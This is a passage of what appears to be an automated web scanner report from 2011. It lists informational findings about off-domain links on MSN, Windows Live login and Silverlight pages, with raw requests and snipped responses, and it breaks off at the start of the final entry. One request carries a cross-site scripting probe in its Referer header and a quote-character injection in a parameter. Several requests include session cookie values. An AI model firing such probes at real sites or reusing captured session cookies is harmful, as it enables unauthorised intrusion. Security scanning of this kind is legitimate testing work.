Host:   http://local.redacted
Path:   /weather.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /weather.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:24 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=acb0561427894b149cf52a80b9c8b5c8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=81F237145A154546BE9C16F2A256A506; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:24 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406224&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Fweather.aspx%3Fq%3DDallas-TX%26zip%3D75201&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&amp;mkt=en-us&amp;FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75201">Yellow pages</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/today?q=Dallas+TX+weather&amp;unit=F&amp;Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/weather/forecast?q=Dallas+TX+weather&amp;unit=F&amp;Form=MSNLAP">Compare forecasts from multiple weather providers</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&amp;resize=false">Feedback</a>
...[SNIP]...

22.130. http://local.redacted/weather.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /weather.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /weather.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:40 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c5c75e08cc68426881e3694bd3f9a395; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E00324EC5C7F4EC9A83E6655A7F8FC3A; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:40 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 48991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344860&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Fweather.aspx%3Fq%3DDallas-TX%26zip%3D75201&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&amp;mkt=en-us&amp;FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75201">Yellow pages</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/today?q=Dallas+TX+weather&amp;unit=F&amp;Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/weather/forecast?q=Dallas+TX+weather&amp;unit=F&amp;Form=MSNLAP">Compare forecasts from multiple weather providers</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&amp;resize=false">Feedback</a>
...[SNIP]...

22.131. http://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.live.com
Path:   /login.srf

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1253879194&rver=6.0.5285.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&lc=1033&id=64855&mkt=en-us HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:47:54 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H23 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:46:54 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344874&id=64855&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-8ea8ec15-7602-4ffd-bb4f-7be5753c81c7; path=/;version=1
X-Frame-Options: deny
Content-Length: 13609

<!-- ServerInfo: BAYIDSLGN1H23 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script><link rel="image_src" href="http://Img.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/images/Windows_Live_v_thumb.jpg" / >
<script type="text/javascript">
...[SNIP]...
</script><script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js"></script>
<script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/WLWorkflow.js"></script>
...[SNIP]...

22.132. https://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US HTTP/1.1
Host: login.live.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; xidseq=1; mktstate=S=821848180&U=&E=&P=&B=en-us; mkt1=norm=en-us; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; wla42=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 29 Jan 2011 23:12:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:11:17 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H55 V: 0
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342737&co=1&id=251248; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Vary: Accept-Encoding
Content-Length: 13981

<!-- ServerInfo: BAYIDSLGN1H55 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script>
<link rel="stylesheet" title="R3CSS" type="text/css" href="https://secure.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/css/R3WinLive1033.css"/><style type="text/css">
...[SNIP]...

22.133. https://login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/post.srf

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /ppsecure/post.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US&bk=1296342737 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:15 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H58 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:15 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-d99a2e93-5037-4edc-af4e-025279d033ed; path=/;version=1
X-Frame-Options: deny
Content-Length: 13683

<!-- ServerInfo: BAYIDSLGN1H58 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script>
<link rel="stylesheet" title="R3CSS" type="text/css" href="https://secure.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/css/R3WinLive1033.css"/><style type="text/css">
...[SNIP]...

22.134. https://login.live.com/ppsecure/secure.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/secure.srf

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /ppsecure/secure.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&id=251248&cbcxt=hom&wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&id=251248&cbcxt=hom&vv=900&mkt=EN-US&lc=1033&bk=1296342737 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:13:16 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H46 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:12:16 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296342796&co=1&id=251248; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-a94efd6f-f0dc-426f-9b9b-a74c06b53358; path=/;version=1
X-Frame-Options: deny
Content-Length: 16154

<!-- ServerInfo: BAYIDSLGN1H46 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script>
<link rel="stylesheet" title="R3CSS" type="text/css" href="https://secure.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/css/R3WinLive1033.css"/><style type="text/css">
...[SNIP]...

22.135. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx HTTP/1.1
Host: login.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; s_sq=%5B%5BB%5D%5D; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9052
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/default.aspx; domain=login.silverlight.net; expires=Sun, 30-Jan-2011 16:41:35 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:31:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296405095&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296405095&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.136. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /login/createuser.aspx?returnurl=' HTTP/1.1
Host: login.silverlight.net
Connection: keep-alive
Referer: https://login.silverlight.net/login/signin.aspx?returnurl=%27%22%20ns=alert(0x0000C7)%20
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dhttps%25253A//login.silverlight.net/login/createuser.aspx%25253Freturnurl%25253D%252527%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 17:32:32 GMT
Content-Length: 8922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Create
...[SNIP]...
<p class="no_lines">
<a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296408753&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&amp;lc=1033&amp;id=265631">Sign in</a>
...[SNIP]...
<p class="no_lines"><a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296408753&amp;rver=6.0.5276.0&amp;wp=LBI_SSL&amp;wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3D%27&amp;lc=1033&amp;id=265631"><img src="https://www.passportimages.com/1033/signin.gif" class="PassportSignIn" alt="Sign in to Windows Live ID" style="border-style:none" id="idSI"/></a>
...[SNIP]...

22.137. https://login.silverlight.net/login/createuser.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/createuser.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

